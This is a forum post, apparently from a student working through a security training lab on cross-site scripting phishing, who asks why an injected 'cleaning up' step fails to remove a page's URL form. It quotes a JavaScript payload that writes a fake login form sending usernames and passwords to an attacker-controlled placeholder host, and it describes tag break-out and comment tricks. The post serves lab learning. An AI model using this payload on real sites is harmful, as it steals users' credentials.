While doing the exercise and following along, in the “Login For Injection” and “Cleaning Up” subsections, the following does not get rid of the URL entry form and I am unsure as to how to fix it to get rid of the URL form.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
I was able to do the login form injection by modifying the method using '> to comment out the img tag and then just injecting the raw HTML instead of minifying it and commenting out the end with <!--. I feel like minifying it should make it easier, and would like to understand how to do it using that method. Already tried googling many things. Might need to just take a break to let it all sink in. Thanks for any guidance you can provide.